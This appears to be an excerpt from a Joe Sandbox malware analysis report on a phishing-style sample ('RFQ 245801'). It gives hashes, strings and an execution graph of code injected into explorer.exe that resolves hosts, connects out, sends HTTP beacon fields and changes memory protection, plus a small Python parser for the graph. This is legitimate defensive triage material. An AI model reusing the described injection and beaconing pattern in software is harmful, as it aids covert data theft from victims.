• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
• ExecuteOptions, xrefs: 017946A0
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
• Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
• Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
• Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
• Instruction ID: 3245c9b7563af3ce16c41bba3c1a241256f08534930d4d83e0f41b77b2d81365
• Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
• Instruction Fuzzy Hash: 85020371508342AFD709CF18C494A6BFBE5EFC8700F548A2DBA998B364DB31E945CB52
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
• Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
• Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
• Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                                                                                                  • Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 0179031E
                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                  • Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                                                                                                  • Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                                                                                                  • Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 01797B8E
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 01797BAC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                                  • Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                                                                                                  • Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
                                                                                                                                                                                  • Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 017972A3
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 017972C1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                                  • Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                                                                                                  • Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
                                                                                                                                                                                  • Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                                                  • Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                                                                                                  • Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                                                                                                  • Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                  • Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                                                                                                  • Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                                                                                                  • Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:2.3%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:4.7%
                                                                                                                                                                                  Total number of Nodes:444
                                                                                                                                                                                  Total number of Limit Nodes:15
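The execution_graph data in this section is a flat token stream: each node is a decimal id followed by a hex function address and optional label words (an API name, or the summary "6 API calls"), and each edge is written `src->dst`. That is hard to read on the page, so the following Python, added here as an editor's example and not part of the Joe Sandbox report or its tooling, parses the token stream, finds the entry node of each component (a node with no incoming edge) and lists the API labels reachable from it. The token grammar is inferred from the listing on this page, and the embedded sample is the first two components of that listing copied verbatim and truncated.

```python
"""Parse a Joe Sandbox 'execution_graph' token dump into nodes and edges.

Token grammar as observed in the report text (an inference, not a documented
format): a node is a decimal id, then a hex address, then zero or more label
words; an edge is '<src>-><dst>'. Everything is whitespace separated.
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{6,16}$")   # 32-bit addresses here; allows 64-bit too
ID_RE = re.compile(r"^\d+$")

# Sample input: the first two components of the execution_graph listing on this
# page, copied verbatim and cut after the edge 13928->13929.
SAMPLE = (
    "execution_graph 13803 fba8f7a 13804 fba8fb8 13803->13804 13805 fba55b2 socket "
    "13804->13805 13807 fba9081 13804->13807 13814 fba9022 13804->13814 13805->13807 "
    "13806 fba9134 13808 fba5732 connect 13806->13808 13813 fba91b2 13806->13813 "
    "13806->13814 13807->13806 13809 fba9117 getaddrinfo 13807->13809 13807->13814 "
    "13808->13813 13810 fba56b2 send 13812 fba9729 13810->13812 13811 fba97f4 "
    "setsockopt recv 13811->13814 13812->13811 13812->13814 13813->13810 13813->13814 "
    "13927 fba783a 13928 fba7841 13927->13928 13929 fba8f82 6 API calls 13928->13929"
)


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> (addr, label); edges maps id -> set of ids."""
    nodes = {}
    edges = defaultdict(set)
    tokens = text.split()
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges[edge.group(1)].add(edge.group(2))
            i += 1
            continue
        # A new node is a decimal id whose next token is a hex address. Checking
        # the next token keeps the '6' of '6 API calls' from becoming a node id.
        if ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "label": []}
            i += 2
            continue
        if current is not None:          # label word for the node being defined
            nodes[current]["label"].append(tok)
        i += 1                           # leading 'execution_graph' token is skipped
    return {k: (v["addr"], " ".join(v["label"])) for k, v in nodes.items()}, edges


def roots(nodes, edges):
    """Node ids with no incoming edge: the entry function of each graph component."""
    targets = {dst for dsts in edges.values() for dst in dsts}
    return sorted((n for n in nodes if n not in targets), key=int)


def reachable_apis(nodes, edges, root):
    """Sorted labels (API names or summaries) on every node reachable from root."""
    seen, stack, labels = set(), [root], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        _addr, label = nodes.get(n, ("", ""))
        if label:
            labels.add(label)
        stack.extend(edges.get(n, ()))
    return sorted(labels)


def summarize(text):
    """Map each entry function's address to the API labels it can reach."""
    nodes, edges = parse_graph(text)
    return {nodes[r][0]: reachable_apis(nodes, edges, r) for r in roots(nodes, edges)}


if __name__ == "__main__":
    for addr, apis in summarize(SAMPLE).items():
        print(addr, "->", ", ".join(apis) or "(no API nodes)")
```

Run on the sample, the component rooted at fba8f7a resolves to the socket, getaddrinfo, connect, send and setsockopt/recv chain, which is the network client path of the injected code; the component rooted at fba783a only reaches a node the report summarises as "6 API calls". Paste the full listing into `SAMPLE` (or read it from a file) to get the same per-entry-function summary for the whole graph.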
execution_graph (node and edge data behind the rendered graph; not reproduced in full). API-labelled nodes in this part of the listing, by function address: socket fba55b2; getaddrinfo fba9117; connect fba5732, fba5788; send fba56b2; setsockopt/recv fba97f4; NtCreateFile fba8232, fba8410, fb9e082, fb9df52, fba2352, fba2602; NtProtectVirtualMemory fb9d8f2, fba7ab2, fba9e12, fba9e45; ObtainUserAgentString fba4382, fba3995, fba38c2; CreateMutexExW fb9fcb5; CreateThread fb9d44d; SleepEx fb9d328. Several nodes carry only the summary label "6 API calls" (fba8f82, fb9d0f2, fb9d012, fba3662, fba50c2).
13505->13481 13507 fb9d113 13507->13505 13508 fba8f82 6 API calls 13507->13508 13508->13505 13510 fba8fb8 13509->13510 13513 fba9081 13510->13513 13520 fba9022 13510->13520 13537 fba55b2 13510->13537 13512 fba9134 13519 fba91b2 13512->13519 13512->13520 13540 fba5732 13512->13540 13513->13512 13515 fba9117 getaddrinfo 13513->13515 13513->13520 13515->13512 13517 fba97f4 setsockopt recv 13517->13520 13518 fba9729 13518->13517 13518->13520 13519->13520 13543 fba56b2 13519->13543 13520->13485 13522 fba786d 13521->13522 13546 fba8232 13522->13546 13524 fba7906 13524->13488 13525 fba7888 13525->13524 13526 fba8f82 6 API calls 13525->13526 13527 fba78c5 13525->13527 13526->13527 13527->13524 13528 fba8232 NtCreateFile 13527->13528 13528->13524 13530 fba79c2 13529->13530 13531 fba8232 NtCreateFile 13530->13531 13533 fba79d6 13531->13533 13532 fba7a9f 13532->13491 13533->13532 13534 fba7a5d 13533->13534 13536 fba8f82 6 API calls 13533->13536 13534->13532 13535 fba8232 NtCreateFile 13534->13535 13535->13532 13536->13534 13538 fba560a socket 13537->13538 13539 fba55ec 13537->13539 13538->13513 13539->13538 13541 fba576a 13540->13541 13542 fba5788 connect 13540->13542 13541->13542 13542->13519 13544 fba56e7 13543->13544 13545 fba5705 send 13543->13545 13544->13545 13545->13518 13548 fba825c 13546->13548 13549 fba8334 13546->13549 13547 fba8410 NtCreateFile 13547->13549 13548->13547 13548->13549 13549->13525 13551 fb9e420 13550->13551 13552 fb9e0aa 13550->13552 13551->13500 13552->13551 13553 fba8232 NtCreateFile 13552->13553 13555 fb9e1f9 13553->13555 13554 fb9e3df 13554->13500 13555->13554 13556 fba8232 NtCreateFile 13555->13556 13557 fb9e3c9 13556->13557 13558 fba8232 NtCreateFile 13557->13558 13558->13554 13560 fb9df70 13559->13560 13561 fb9df84 13559->13561 13560->13497 13562 fba8232 NtCreateFile 13561->13562 13563 fb9e046 13562->13563 13563->13497 13565 fb9d031 13564->13565 13566 fb9d0cd 13565->13566 13567 fba8f82 6 API calls 13565->13567 13566->13507 13567->13566 13947 
fbaaa1f 13948 fbaaa25 13947->13948 13951 fb9e5f2 13948->13951 13950 fbaaa3d 13952 fb9e5fb 13951->13952 13953 fb9e60e 13951->13953 13952->13953 13954 fba3662 6 API calls 13952->13954 13953->13950 13954->13953 13915 fba0edd 13917 fba0f06 13915->13917 13916 fba0fa4 13917->13916 13918 fb9d8f2 NtProtectVirtualMemory 13917->13918 13919 fba0f9c 13918->13919 13920 fba4382 ObtainUserAgentString 13919->13920 13920->13916 13736 fba9e12 13737 fba8942 13736->13737 13738 fba9e45 NtProtectVirtualMemory 13737->13738 13739 fba9e70 13738->13739 13955 fb9e613 13957 fb9e620 13955->13957 13956 fb9e67e 13957->13956 13958 fba9e12 NtProtectVirtualMemory 13957->13958 13958->13957 13921 fba2cd4 13923 fba2cd8 13921->13923 13922 fba3022 13923->13922 13924 fba2352 NtCreateFile 13923->13924 13925 fba2f0d 13924->13925 13925->13922 13926 fba2792 NtCreateFile 13925->13926 13926->13925 13823 fba214a 13824 fba2153 13823->13824 13829 fba2174 13823->13829 13825 fba4382 ObtainUserAgentString 13824->13825 13827 fba216c 13825->13827 13826 fba21e7 13828 fb9d0f2 6 API calls 13827->13828 13828->13829 13829->13826 13831 fb9d1f2 13829->13831 13832 fb9d20f 13831->13832 13833 fb9d2c9 13831->13833 13834 fb9d242 13832->13834 13835 fba7f12 7 API calls 13832->13835 13833->13829 13837 fb9e432 NtCreateFile 13834->13837 13838 fb9d289 13834->13838 13835->13834 13836 fb9d0f2 6 API calls 13836->13833 13837->13838 13838->13833 13838->13836 13959 fba9e0a 13960 fba9e45 NtProtectVirtualMemory 13959->13960 13961 fba8942 13959->13961 13962 fba9e70 13960->13962 13961->13960 13963 fbaaa4d 13964 fbaaa53 13963->13964 13967 fb9e782 13964->13967 13966 fbaaa6b 13969 fb9e78f 13967->13969 13968 fb9e7ad 13968->13966 13969->13968 13970 fba3662 6 API calls 13969->13970 13970->13968 13716 fba8f82 13717 fba8fb8 13716->13717 13718 fba55b2 socket 13717->13718 13720 fba9081 13717->13720 13727 fba9022 13717->13727 13718->13720 13719 fba9134 13721 fba5732 connect 13719->13721 13726 fba91b2 13719->13726 13719->13727 13720->13719 13722 fba9117 
getaddrinfo 13720->13722 13720->13727 13721->13726 13722->13719 13723 fba56b2 send 13725 fba9729 13723->13725 13724 fba97f4 setsockopt recv 13724->13727 13725->13724 13725->13727 13726->13723 13726->13727

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
Similarity
• API ID: getaddrinforecvsetsockopt
• String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
• API String ID: 1564272048-1117930895
• Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction ID: adc72e1cb1b57d6fa752f4858f00b4d3be6875b64745b463f2137d7a784422c3
• Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction Fuzzy Hash: 7B529F30618B088FCB29EF68D4847EAB7E1FB54300F5046AEC49FCB146DE35A949DB91

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
Similarity
• API ID: CreateFile
• String ID: `
• API String ID: 823142352-2679148245
• Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction ID: 94d13557e99ff7fe2420edea372537b383010d550e727523ac4e44c787e226d9
• Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
• Instruction Fuzzy Hash: FE225970A18F099FCB59EF28D4886AAF7E1FB98301F80026EE45ED7651DB31E451CB85

Control-flow Graph

APIs
• NtProtectVirtualMemory.NTDLL ref: 0FBA9E67
Memory Dump Source
• Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction ID: d7e69e934bef4bfacae58bfc8db0ba1695681777f7d43883fa37a9070ad1b6c7
• Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction Fuzzy Hash: 93019E34628B484F8B88EF6CE48012AB7E4FBC9215F000B3EA99AC3251EB64C5414B42

Control-flow Graph

APIs
• NtProtectVirtualMemory.NTDLL ref: 0FBA9E67
Memory Dump Source
• Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction ID: 7ecd2fe94fce218bc90cbc65f0ed8c54637335b09189e954dd00d3d21b3bed9c
• Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction Fuzzy Hash: 1A01A73462CB884B8B48EB7C94411A6B3E5FBCE314F000B7EE59AC3241DB25D5014B82

Control-flow Graph

APIs
• ObtainUserAgentString.URLMON ref: 0FBA39A0
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: b8abffa7a978b271bd978b09b52d2bfbcc6170ea3ebc6d20754c578345392ad3
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: 6C31F130618B0C8FCB10EFA8D8847EDB7E4FB58204F40026AD55EE7241DF798644CB99

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0FBA39A0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                  • Instruction ID: bab773f8eebb5c5cea01ce2aef83449c3c68a65fa8cd7ebcbd588f99600d8675
                                                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA210430618B0C8FCB14EFA8D8847EDBBE4FF58204F40026AD45AE7241DF798644CB99

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 232 fb9fb66-fb9fb68 233 fb9fb6a-fb9fb71 232->233 234 fb9fb93-fb9fbb8 232->234 236 fb9fbbb-fb9fc22 call fba6612 call fba8942 * 2 233->236 237 fb9fb73-fb9fb92 233->237 234->236 244 fb9fc28-fb9fc2b 236->244 245 fb9fcdc 236->245 237->234 244->245 246 fb9fc31-fb9fcb0 call fbaada4 call fbaa022 call fbaa3e2 call fbaa022 call fbaa3e2 244->246 247 fb9fcde-fb9fcf6 245->247 259 fb9fcb5-fb9fcca CreateMutexExW 246->259 260 fb9fcce-fb9fcd3 259->260 260->245 261 fb9fcd5-fb9fcda 260->261 261->247
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                  • Instruction ID: 31580852f2caea67b2feed301d41ff39bfa1d35b8ccd710059a974e4874e0d2e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                  • Instruction Fuzzy Hash: C4417870918A08CFCF94EFA8D8987AD77F0FB58301F4441BAC84ADB216DA349945CB91

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                  • Instruction ID: 0192fd6840814bf5e9dd5e2f56f70bfba33d1a5be623568eaf32c27f0397ba4b
                                                                                                                                                                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71416970918A088FCB94EFA8D4987ED77F0FB58300F0441BAC84EDB256DA349945CB95

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 289 fba572e-fba5768 290 fba576a-fba5782 call fba8942 289->290 291 fba5788-fba57ab connect 289->291 290->291
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
